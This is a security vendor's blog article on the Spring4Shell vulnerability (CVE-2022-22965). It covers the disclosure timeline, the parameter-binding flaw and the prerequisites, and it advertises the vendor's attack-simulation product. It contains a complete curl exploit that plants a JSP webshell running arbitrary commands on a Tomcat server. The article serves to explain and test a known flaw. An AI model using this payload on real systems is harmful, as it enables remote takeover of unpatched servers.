FourCore
Article
Last Updated on Fri Apr 1, 2022
Critical Zero-Day RCE Vulnerability in Spring Core: Spring4shell (CVE-2022-22965)
Written by Aarush Ahuja
Co-founder @ FourCore
Exploiting Spring4shell in an intentially vulnerable application

TL;DR: CVE-2022-22965 is a Critical Zero-Day RCE Vulnerability in Spring Core due to how parameters are deserialized to Java objects by Spring. We have created an open-source exploit PoC with a vulnerble application and exploit payload you can try right now: spring4shell-exploit-poc.

How was Spring4shell or CVE-2022-22965 discovered?

On March 29th 2022, A chinese security researcher on Twitter released screenshots showing RCE in a Spring Core application which is now assigned CVE-2022-22965. The researcher also released a Python exploit and a vulnerability report written in Chinese. The tweets have since been deleted and the researcher has deleted their accounts.

The assigment of the CVE took some time as to analyse and confirm the vulnerability posted by the researcher. The CVE was assigned on March 31st, 2022, given a Critical and a CVSS score of 9.8.

How does Spring4shell work?

Our HelloController below contains a @PostMapping to /greeting. When we request this route via the Tomcat server, http://app/helloworld/greeting, it transforms the HTTP request data into a POJO or Plain Old Java Object, in this case, a Greeting object. Under the hood, Spring uses deserialization to convert this request data into Java objects, mapping each field to a value in the Java object. As it turns out, you can set many more fields including the properties of a class.

1@Controller
2public class HelloController {
3    @GetMapping("/greeting")
4    public String greetingForm(Model model) {
5        model.addAttribute("greeting", new Greeting());
6        return "hello";
7    }
8
9    @PostMapping("/greeting")
10    public String greetingSubmit(@ModelAttribute Greeting greeting, Model model) {
11        return "hello";
12    }
13}

Using curl we combine a few headers and POST data and are able to write a JSP webshell to webapps/ROOT on the contain which gives us Remote Code Execution ability via http://app/shell.jsp?cmd=<cmd?.

1$ curl
2-H "prefix:<%"
3-H "suffix:%>//"
4-H "c:Runtime"
5-H "Content-Type: application/x-www-form-urlencoded"
6-d "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bprefix%7Di%20java.io.InputStream%20in%20%3D%20%25%7Bc%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
7http://localhost:8080/helloworld/greeting

Impact of Spring4Shell

The impact of vulnerability is wide as it is trivial to exploit and a large amount of Java applications are using Spring. Thus, explaining the high CVSS score. The prequisities to exploit it are common:

  • JDK version 9+
  • Application built on Spring Or derived frameworks
  • Running Tomcat with WAR deployment

Depending on frameworks and libraries is essential, however, vulnerabilities such as Spring4Shell and Log4Shell pose immense risk to the organization. You want to ensure that your security controls are working across the attack surface. FourCore ATTACK can help you ensure this by routinely assessing your security controls with real-world attack simulations.

Resources

FourCore ATTACK Breach and Attack Simulation